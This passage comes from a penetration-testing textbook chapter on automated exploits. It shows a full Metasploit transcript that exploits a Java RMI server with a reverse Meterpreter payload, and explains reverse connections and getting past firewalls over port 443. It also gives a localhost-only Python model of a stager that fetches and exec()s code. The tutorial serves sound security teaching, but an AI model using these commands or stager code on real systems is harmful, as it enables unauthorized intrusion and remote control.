Chapter 5: Automated Exploits
What you end up with after the exploit has occurred is based on the payload, and that can be set after you have selected which exploit you want to run. As an example of running an exploit while changing the payload in use, you can look at Example 5-18. This exploit targets the Java Remote Method Invocation (RMI) server, which is used to provide interprocess communication, including across systems over a network. Because we are exploiting a Java process, we're going to use the Java implementation of the Meterpreter payload.
Example 5-18. Using the Meterpreter payload

msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.86.147
RHOST => 192.168.86.147
msf exploit(multi/misc/java_rmi_server) > set LHOST 192.168.86.21
LHOST => 192.168.86.21
msf exploit(multi/misc/java_rmi_server) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.86.21:4444
msf exploit(multi/misc/java_rmi_server) >
[*] 192.168.86.147:1099 - Using URL: http://0.0.0.0:8080/6XjLLZsheJ9
[*] 192.168.86.147:1099 - Local IP: http://192.168.86.21:8080/6XjLLZsheJ9
[*] 192.168.86.147:1099 - Server started.
[*] 192.168.86.147:1099 - Sending RMI Header...
[*] 192.168.86.147:1099 - Sending RMI Call...
[*] 192.168.86.147:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.86.147
[*] Meterpreter session 1 opened (192.168.86.21:4444 -> 192.168.86.147:36961) at 2018-01-24 21:13:26 -0700
You'll see that in addition to setting the remote host, I've set the local host (LHOST). This is necessary for the payload. You may notice that the payload name includes reverse_tcp. This is because after the exploit succeeds, the payload runs on the target and initiates a connection back to the attacking system. This is why it's called reverse: the connection comes back to the attacker rather than the attacker connecting in to the target. The listener for that connection is what Metasploit means by "Started reverse TCP handler on 192.168.86.21:4444"; the port defaults to 4444 and can be changed with set LPORT before you run the exploit (binding a port below 1024, such as 443, requires root privileges on the attacking machine).

The listing also shows that this particular exploit needs the target to reach back to the attacker even before the payload runs. Metasploit stands up a small web server on port 8080 of the attacking machine (the module's SRVPORT option) and then sends an RMI call that causes the RMI server to load the payload JAR from http://192.168.86.21:8080/6XjLLZsheJ9. Only once the JAR has been fetched and run does the stager connect back to port 4444 and receive the 53,837-byte Meterpreter stage, at which point the session is opened. If either port is unreachable from the target, the exploit will appear to run but no session will appear.

A reverse connection is useful, if not essential, because a firewall that blocks inbound connections to the target will usually still allow connections outbound, especially if they go to a well-known port. One of the ports commonly used for these connections is 443, the SSL/TLS port for encrypted web communications. Keep in mind that reverse_tcp on port 443 only borrows the port number; the traffic is plain TCP, not TLS, so a proxy or firewall that inspects the content of traffic on 443 can still identify it. Metasploit provides HTTPS variants of the payload (for example java/meterpreter/reverse_https) for that case.
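The reverse-connection and staging behaviour visible in the listing ("Started reverse TCP handler", "Sending stage (53837 bytes)", "Meterpreter session 1 opened") can be modelled in a few lines of Python. The following is an added example written for this chapter, not code from the book or from Metasploit. Both sides run on localhost, the listening port is chosen by the operating system rather than fixed at 4444, and the "stage" is a constructed two-line Python snippet that the stager exec()s and reports on. The 4-byte length-prefix framing is modelled on Metasploit's native reverse_tcp stagers; the Java stager's own framing differs.

```python
import socket
import struct
import threading

# Constructed stage for this demonstration. In the listing the stage is the
# Java Meterpreter (53837 bytes); here it is two lines of Python that the
# stager will exec() and then report back on over the same connection.
STAGE = b"import os\nresult = 'stage running as pid %d' % os.getpid()\n"


def recv_exact(sock, n):
    """Read exactly n bytes; a stager must loop because recv() may return less."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the stage was complete")
        buf += chunk
    return buf


def handler(lhost, stage, info, ready, sessions):
    """Attacker side: the listener that 'Started reverse TCP handler' refers to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, 0))                 # port 0: let the OS pick a free LPORT
    srv.listen(1)
    info["lport"] = srv.getsockname()[1]
    ready.set()
    conn, peer = srv.accept()            # the connection comes IN from the target
    with conn:
        # Stage the payload: 4-byte little-endian length, then the stage bytes
        # (the same framing the native reverse_tcp stagers use).
        conn.sendall(struct.pack("<I", len(stage)) + stage)
        report = conn.recv(4096).decode()
    srv.close()
    sessions.append({"peer": peer, "report": report})   # "session 1 opened"


def stager(lhost, lport):
    """Target side: what runs after the exploit, connecting OUT to LHOST:LPORT."""
    with socket.create_connection((lhost, lport)) as s:
        (size,) = struct.unpack("<I", recv_exact(s, 4))
        stage = recv_exact(s, size)
        ns = {}
        exec(stage.decode(), ns)         # the stager's only job: run what it fetched
        s.sendall(ns["result"].encode())
    return size


def demo(lhost="127.0.0.1"):
    """Run both sides on localhost; returns (stage_size_sent, session_record)."""
    info, sessions = {}, []
    ready = threading.Event()
    t = threading.Thread(target=handler, args=(lhost, STAGE, info, ready, sessions))
    t.start()
    ready.wait(timeout=5)
    size = stager(lhost, info["lport"])
    t.join(timeout=5)
    return size, sessions[0]


if __name__ == "__main__":
    size, session = demo()
    print("sent %d-byte stage; session opened from %s:%d -> %s"
          % (size, session["peer"][0], session["peer"][1], session["report"]))
```

The point to notice is the direction of each call: the attacker side only ever calls bind(), listen() and accept(), while the target side is the one that calls connect(). A firewall in front of the target that permits outbound TCP sees nothing different from any other outbound connection, which is exactly why the reverse payload is chosen.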